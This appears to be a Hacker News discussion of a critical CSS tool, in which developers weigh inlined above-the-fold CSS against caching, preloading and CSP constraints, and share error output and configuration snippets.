I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.
> Place your original non-critical CSS <link> tags just before the closing </body> tag
I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).
These days I'd recommend:
<link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="styles.css"></noscript>
[0] https://web.dev/articles/preload-scannerAssume it's either 103 Early Hints or Resource Hints in HTTP/1.1 and 2.0.
When the stylesheet loads and is applied to the CSSOM it’s going to trigger layout and style calculations for the elements it’s applied to maybe even the whole page
Browsers are pretty eager at fetching stylesheets even those at the bottom of the page
> Browsers are pretty eager at fetching stylesheets even those at the bottom of the page
Browsers begin fetching resources as they discover them. For a big enough document, that will mean low placed resources will suffer.
The whole philosophy of critical styles philosophy being those about the fold is a mistake in my view
Far better to adopt approaches like those recommended by Andy Bell that dramatically reduces stylesheet size
And do critical styles “correctly” i.e. load those that are needed to render the initial page and load the ones that rely on interactions separately
On the contrary, the more complex the css is or the more resources loaded, the less this would be worthwhile.
The thing i think they are trying to optimize is latency due to RTT. When you first request the html file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) css, the more expensive this optimisation is so the less likely it is a net benefit.
We were doing this optimization more than a decade ago when I worked at HuffPost.
This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project all for very minimal if any improvement for the hypothetical end user (who will be subject to much greater forces out of the developer's control like their network speed)
I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.
Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.
To me thinking about how CSS loads is task #1, but I probably have some unique needs.
We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.
I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after-the-fact. We made pretty much everything on the page load in-line including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed. I took all the advice Google Lighthouse was giving me, and implemented our pages in a way that satisfies it completely. It wasn't really that difficult but it required me changing my thinking about how to approach building websites.
We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.
If performance is the goal, there is no such thing as premature optimization, it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close, unless they put in the work and start thinking differently about the problem.
I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.
Built on Astro web framework
HTML: 27.52KB uncompressed (6.10KB compressed)
JS: <10KB (compressed)
Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.
In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.
The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.
If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.
Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve lighting fast experience once you move away from shared hosting territory.
A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.
I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.
I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.
One useful trick to keep in mind is that CSS content-visibility only applies in certain scenarios. One agency I came across using <iframe> for every section is a bad idea.
So my conclusion is mobile-first CSS is generally more practical and use PWA which I'm building now for site that has lots of listings.
It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.
Edit: on second reading, it seems like you are saying when another page from the same server with the same style loads again, the css would have to be reloaded and This increases bandwidth in cases where a site visitor loads multiple pages. So yes it is optimum for conditions where the referrer is external to the site.
I mean, i agree with you that this is insanely easy to screw up. However in most websites there is obviously css which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.
Feedback welcome, it's free for now.
Given there seem to be few other Critical CSS tools out there, its utility in driving web performance, and the fact Google's web.dev recommended tool (https://github.com/addyosmani/critical) uses penthouse under the hood, I'm surprised there isn't more effort and/or sponsorship going into helping maintain it.
Or maybe they are saying this would always be worth it?
I assume it'd be a trade off between a number of factors. How many returning vs new visitors? Is css served with proper cache-control headers, 103 early hints and in a cdn? How big is your critical css, and how much of your critical html does it push out of the initial congestion window?
It uses a remote browser to start a Puppeteer session and runs JavaScript code to extract the critical CSS needed for above-the-fold content. We chose Puppeteer because it’s fast to instrument the browser and works well even on JavaScript-heavy sites.
https://github.com/prettydiff/wisdom/blob/master/performance...
That's not to say i think this optimization is neccesarily worth it, just that testing on localhost is not a good test of this.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
body::after{display:none;content:"";background-image:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='1' height='29'><rect style='fill: rgb(196,196,196);' width='1' height='0.25px' x='0' y='28'/></svg>");position:absolute;top:23px;left:0px;z-index:9998;opacity:1;width:1425px;height:3693px;background-size:auto 1.414rem;background-position-y:0.6rem}
(It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore because I forgot I had that in there until I saw it now!)I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.
With a deeper understanding of CSS, one would recognize that simply parsing it out for only the components "above the fold" (which, why are pixels being used here in such an assumptive manner?), completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character-widths, and so many other tools that would negate "needing" to do this in the first place.
With tools such as PostCSS, and servers serving zipped styles across CDN, maintaining a single request to the styles; does it really benefit from breaking up the styles these days?
Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.
For the critical CSS thing, we used to kinda do it by hand with some automation more as a toolset to help us decide how much to include (inside the HTML itself - `<styles>`) and then insert the stylesheet. But then, we always found it better to set a Stylesheet Budget and work with it.
CDNs haven't been cached across domains for years. I.e. using a CDN is no faster than a server serving it itself (usually slower because of DNS lookups, but sometimes slightly faster if the geolocation is closer if the DNS was already looked up).
> Critical CSS refers to the minimal set of CSS rules required to render the visible portion of a webpage (above the fold).
In reality the tool is aimed to style most of the page without loading additional assets so you don't get a jarring repaint when visiting the site.
Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds and they're all worth posting in the spirit of HN, however I am talking about CSPs that disallow shenanigans. Carry on though :^)
<style nonce="sha256-Ce2SAZQd/zkqF/eKoRIUmEqKy31enl1LPzhnYs3Zb/I=">
html { background: red }
</style>
And a CSP like this default-src 'self'; style-src 'sha256-Ce2SAZQd/zkqF/eKoRIUmEqKy31enl1LPzhnYs3Zb/I='
Here's how I automate mine:https://github.com/uxtely/js-utils/blob/ad7d9531e108403a4146...
Wait, why on earth is this a thing?
- injecting css to restyle the page as part of a social engineering attack or to otherwise trick the user into doing something stupid
- using css to load an image or something to track users viewing the page or capture their IP address
- leak the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).
On the whole though, the surface area is small compared to javascript. I often see people restrict css before js (or doing the js restrictions incorrectly) because restricting css is much easier, but that is really silly as an attacker will always reach for javascript first if its available.
Even when they do they might be subject to a security audit forbidding it. There's two reasons nonces can suck: first is that nonces may be passed around for 3rd party script usage and that blows a hole in your security policy, and the other is that many implementations to generate nonces are not implemented correctly, so the security team might have less trust in devs.
It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.
I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
Most of the CSS that gets used below the fold on a single page on most pages, gets used above it too. Especially when considering it needs to handle large desktop monitors, and responsiveness. And then remaining part (e.g. styling a footer) is tiny.
The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.
There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.
But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.
That's a terrible tradeoff.
And if a site has a single CSS file, there's only ever a CSS round-trip on the first page. There aren't any round-trips afterwards.
This technique is usually combined with preloads so the parser can identify assets that should be prefetched while the remaining packets are still being downloaded.
If your "Critical CSS" is small enough (i.e., it fit well within the client's CWND), it is very possible it doesn't increase the total number of roundtrips at all.
As a web developer, if you are optimizing for above-the-fold CSS, you are already optimizing in lots of other ways, and should be fully cognizant of the potential trades for the optimization solutions that are available to you.
There are lots of ways to optimize CSS. I continue to think this particular one is not a good idea under any circumstance, because it's anti-caching and eliminating a since round-trip once is just not ever going to be worth it.
The data is most definitely cached if the server sets the cache expiry for the HTML file, so "anti-caching" makes no sense and is completely orthogonal to the optimization.
If the page's critical CSS is small enough you can deliver an HTML page where the initial render a) happens sooner, and b) is a complete Skelton of your layout + initial content. All at the low low price of ~0 additional client-server roundtrips.
Fun fact: facebook inlines a `style` tag and all HTML necessary to render their initial loading screen. It isn't what I would call "above the fold" CSS, but it is what is referred to as "Critical CSS".
Aside: the most popular and most-used SPAs are scrollers: twitter, instagram, facebook, github, etc, so now I wonder if you might be just trolling?
(Not embedded within the HEAD/STYLE tag)
On a very high traffic site, sure. Anything smaller and I’d argue you should just shove everything down the pipe in one request if you can.
If the bandwidth bothers you, delete an image. You likely don’t have anywhere near that amount in CSS to make up.
My problem is the codebase I am running towards. I am making headway with scoped CSS, however, Firefox does not have it yet. I keep checking in on Firefox to see when that is going to support scoped CSS but I have not been able to determine what the hold up is.
Does anyone have scoped CSS working with a workaround or compromise for Firefox?